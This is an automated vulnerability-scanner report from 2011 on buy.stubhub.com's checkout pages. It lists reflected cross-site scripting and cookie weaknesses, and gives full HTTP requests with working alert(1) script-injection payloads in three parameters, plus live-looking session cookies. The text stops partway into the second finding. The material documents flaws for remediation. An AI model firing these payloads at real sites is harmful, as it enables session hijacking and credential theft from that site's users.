buy.stubhub.com, XSS, Cross Site Scripting, CWE-79

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Wed Feb 16 05:46:24 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. https://buy.stubhub.com/checkout/checkout [logisticsMethod parameter]

1.2. https://buy.stubhub.com/checkout/checkout [price parameter]

1.3. https://buy.stubhub.com/checkout/checkout [quantity_selected parameter]

2. SSL cookie without secure flag set

2.1. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform

2.2. https://buy.stubhub.com/checkout/CheckoutSignin

2.3. https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null

2.4. https://buy.stubhub.com/checkout/assets/default.css

2.5. https://buy.stubhub.com/checkout/checkout

2.6. https://buy.stubhub.com/checkout/checkoutsignin.signin.signinform

2.7. https://buy.stubhub.com/checkout/resources/mojito/css/common/stubtool.css

2.8. https://buy.stubhub.com/checkout/services/delivery

2.9. https://buy.stubhub.com/checkout/services/payment

2.10. https://buy.stubhub.com/checkout/services/reviewSubmit

2.11. https://buy.stubhub.com/help/services/popUp

2.12. https://buy.stubhub.com/howToEnableJavaScript.html

2.13. https://buy.stubhub.com/modules/js/referdetect.js

2.14. https://buy.stubhub.com/promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js

2.15. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js

2.16. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-top-e9f04.js

2.17. https://buy.stubhub.com/promotions/scratch/foresee/foresee-trigger.js

2.18. https://buy.stubhub.com/promotions/scratch/lt/www-2.0.css

2.19. https://buy.stubhub.com/promotions/scratch/sh/footer_grad.gif

2.20. https://buy.stubhub.com/promotions/scratch/sh/footer_hands.gif

2.21. https://buy.stubhub.com/promotions/scratch/test/mbox.js

2.22. https://buy.stubhub.com/promotions/scratch/test/s_code_2011_01_27.js

2.23. https://buy.stubhub.com/resources/css/stubhub.css

3. Cookie scoped to parent domain

3.1. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform

3.2. https://buy.stubhub.com/checkout/CheckoutSignin

3.3. https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null

3.4. https://buy.stubhub.com/checkout/assets/default.css

3.5. https://buy.stubhub.com/checkout/checkout

3.6. https://buy.stubhub.com/checkout/checkoutsignin.signin.signinform

3.7. https://buy.stubhub.com/checkout/resources/mojito/css/common/stubtool.css

3.8. https://buy.stubhub.com/checkout/services/delivery

3.9. https://buy.stubhub.com/checkout/services/payment

3.10. https://buy.stubhub.com/checkout/services/reviewSubmit

3.11. https://buy.stubhub.com/help/services/popUp

3.12. https://buy.stubhub.com/howToEnableJavaScript.html

3.13. https://buy.stubhub.com/modules/js/referdetect.js

3.14. https://buy.stubhub.com/promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js

3.15. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js

3.16. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-top-e9f04.js

3.17. https://buy.stubhub.com/promotions/scratch/foresee/foresee-trigger.js

3.18. https://buy.stubhub.com/promotions/scratch/lt/www-2.0.css

3.19. https://buy.stubhub.com/promotions/scratch/sh/footer_grad.gif

3.20. https://buy.stubhub.com/promotions/scratch/sh/footer_hands.gif

3.21. https://buy.stubhub.com/promotions/scratch/test/mbox.js

3.22. https://buy.stubhub.com/promotions/scratch/test/s_code_2011_01_27.js

3.23. https://buy.stubhub.com/resources/css/stubhub.css

4. Cookie without HttpOnly flag set

4.1. https://buy.stubhub.com/checkout/CheckoutSignin

4.2. https://buy.stubhub.com/checkout/checkout

4.3. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform

4.4. https://buy.stubhub.com/help/services/popUp

4.5. https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null

4.6. https://buy.stubhub.com/checkout/assets/default.css

4.7. https://buy.stubhub.com/checkout/checkoutsignin.signin.signinform

4.8. https://buy.stubhub.com/checkout/resources/mojito/css/common/stubtool.css

4.9. https://buy.stubhub.com/checkout/services/delivery

4.10. https://buy.stubhub.com/checkout/services/payment

4.11. https://buy.stubhub.com/checkout/services/reviewSubmit

4.12. https://buy.stubhub.com/howToEnableJavaScript.html

4.13. https://buy.stubhub.com/modules/js/referdetect.js

4.14. https://buy.stubhub.com/promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js

4.15. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js

4.16. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-top-e9f04.js

4.17. https://buy.stubhub.com/promotions/scratch/foresee/foresee-trigger.js

4.18. https://buy.stubhub.com/promotions/scratch/lt/www-2.0.css

4.19. https://buy.stubhub.com/promotions/scratch/sh/footer_grad.gif

4.20. https://buy.stubhub.com/promotions/scratch/sh/footer_hands.gif

4.21. https://buy.stubhub.com/promotions/scratch/test/mbox.js

4.22. https://buy.stubhub.com/promotions/scratch/test/s_code_2011_01_27.js

4.23. https://buy.stubhub.com/resources/css/stubhub.css

5. Password field with autocomplete enabled

6. Cross-domain Referer leakage

6.1. https://buy.stubhub.com/checkout/CheckoutSignin

6.2. https://buy.stubhub.com/checkout/checkout

7. Cross-domain script include

7.1. https://buy.stubhub.com/checkout/CheckoutSignin

7.2. https://buy.stubhub.com/checkout/checkout

8. Email addresses disclosed

8.1. https://buy.stubhub.com/checkout/CheckoutSignin

8.2. https://buy.stubhub.com/checkout/CheckoutSignin

8.3. https://buy.stubhub.com/checkout/CheckoutSignin

8.4. https://buy.stubhub.com/checkout/CheckoutSignin

8.5. https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null

8.6. https://buy.stubhub.com/checkout/assets/default.css

8.7. https://buy.stubhub.com/checkout/checkout

8.8. https://buy.stubhub.com/checkout/checkout

8.9. https://buy.stubhub.com/checkout/checkout

8.10. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform

8.11. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform

8.12. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform

8.13. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform

8.14. https://buy.stubhub.com/checkout/checkoutsignin.signin.signinform

8.15. https://buy.stubhub.com/checkout/resources/mojito/css/common/stubtool.css

8.16. https://buy.stubhub.com/checkout/services/delivery

8.17. https://buy.stubhub.com/checkout/services/payment

8.18. https://buy.stubhub.com/checkout/services/reviewSubmit

8.19. https://buy.stubhub.com/help/services/popUp

8.20. https://buy.stubhub.com/help/services/popUp

9. Robots.txt file

10. Cacheable HTTPS response

11. HTML does not specify charset

12. SSL certificate



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://buy.stubhub.com/checkout/checkout [logisticsMethod parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The value of the logisticsMethod request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbe9c'%3balert(1)//38fa58b682e was submitted in the logisticsMethod parameter. This input was echoed as dbe9c';alert(1)//38fa58b682e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/checkout?logisticsMethod=2dbe9c'%3balert(1)//38fa58b682e&price=100.0&quantity_selected=2&ticket_id=281933854 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=D278406039C110390352E52D5035BF67; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:43:52 GMT
Server: Apache
Set-Cookie: TLTHID=0706664A39C2103900DCB1D380DD1314; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: bc79#20d/checkout/checkout@srwp01byx009.stubprod.com
com-stubhub-dye: bc79#20d/checkout/checkout@srwp01byx009.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 20969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
<script language="javascript" type="text/javascript">
           var signinUrl = 'https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&amp;quantity_selected=2&amp;logisticsMethod=2dbe9c';alert(1)//38fa58b682e&amp;price=100.0&amp;affiliate_id=null';
           var co_serviceFeeDisplay = false;
           var showAddOnPopup_Omni = false;
           //mboxCreate('co_serviceFeeDisplay');
           var co_currentPanel = 'delivery';
           var co
...[SNIP]...

1.2. https://buy.stubhub.com/checkout/checkout [price parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The value of the price request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd155'%3balert(1)//5cc6b2d24fa was submitted in the price parameter. This input was echoed as dd155';alert(1)//5cc6b2d24fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/checkout?logisticsMethod=2&price=100.0dd155'%3balert(1)//5cc6b2d24fa&quantity_selected=2&ticket_id=281933854 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=D278406039C110390352E52D5035BF67; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:44:17 GMT
Server: Apache
Set-Cookie: TLTHID=15DBAE3C39C2103903B38CD8C51420DD; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 2f05#1a5d/checkout/checkout@srwp01byx005.stubprod.com
com-stubhub-dye: 2f05#1a5d/checkout/checkout@srwp01byx005.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 20947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
cript language="javascript" type="text/javascript">
           var signinUrl = 'https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&amp;quantity_selected=2&amp;logisticsMethod=2&amp;price=100.0dd155';alert(1)//5cc6b2d24fa&amp;affiliate_id=null';
           var co_serviceFeeDisplay = false;
           var showAddOnPopup_Omni = false;
           //mboxCreate('co_serviceFeeDisplay');
           var co_currentPanel = 'delivery';
           var co_deliveryPanelRu
...[SNIP]...

1.3. https://buy.stubhub.com/checkout/checkout [quantity_selected parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The value of the quantity_selected request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21c87'%3balert(1)//6e4c259155c was submitted in the quantity_selected parameter. This input was echoed as 21c87';alert(1)//6e4c259155c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=221c87'%3balert(1)//6e4c259155c&ticket_id=281933854 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=D278406039C110390352E52D5035BF67; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:44:36 GMT
Server: Apache
Set-Cookie: TLTHID=2126317239C21039036DCF357B4DEA5E; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 1801#1a86/checkout/checkout@srwp01byx001.stubprod.com
com-stubhub-dye: 1801#1a86/checkout/checkout@srwp01byx001.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 20851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
<script language="javascript" type="text/javascript">
           var signinUrl = 'https://buy.stubhub.com/checkout/CheckoutSignin/ticket_id=281933854&amp;quantity_selected=221c87';alert(1)//6e4c259155c&amp;logisticsMethod=2&amp;price=100.0&amp;affiliate_id=null';
           var co_serviceFeeDisplay = false;
           var showAddOnPopup_Omni = false;
           //mboxCreate('co_serviceFeeDisplay');
           var co_currentPanel =
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 23 instances of this issue:

Issue background

